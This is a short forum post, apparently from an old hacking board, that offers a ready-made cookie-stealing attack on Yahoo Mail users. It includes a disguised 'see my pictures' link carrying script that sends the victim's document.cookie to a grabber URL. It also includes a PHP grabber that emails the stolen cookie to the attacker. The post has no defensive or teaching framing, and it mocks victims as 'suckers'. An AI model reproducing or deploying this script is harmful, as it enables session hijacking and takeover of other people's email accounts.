Site Admin

Joined: 06 Jul 2007
Posts: 129
Location: india
|
|
Send cookie script to victim ! attach the cookie script then when
victim clicks on link you have the cookie ! works on IE and YaHOo BETA !
cookie code
Code:
| Code: |
<div id=yiv1052512133><a target="_blank" rel="nofollow" _
href="http://realestate.yahoo.com/New_York/Schenectady/Homes_for_sale/result.htm
l;_ylt=Auxh9be9E69K5l8hdmj.PAbnMrQs?typeBak=realestate&p=Schenectady,+NY&type=cl
assified&search=Search&priceLow=&priceHigh=&bedroomLow=1&bathroomLow=1.0"&g
t;<script>location.href='http://www.site.com/grabber.php?email=yourmail@ya
hoo.com&cookie='+escape(document.cookie)</script>"
>
Click here to see my pictures</a></div>
Cookie Grabber:
Code:
<?php
## Cookie
## ** Removed **
$myemail = $_GET['email'];
$cookie = $_GET['cookie'];
$today = date("l, F j, Y, g:i a") ;
$subject = "Master you have an sucker" ;
$message = "** Removed ** nnDate: $today nnCookie: n$cookie n**
Removed **";
$from = "From: you<yourid@somesite.net>rn";
mail($myemail, $subject, $message, $from);
echo "<meta http-equiv='refresh'
content='1;url=http://www.somesite.net'>";
?>
|
Change the mail in cookie stealer |
_________________ Avinash
|
|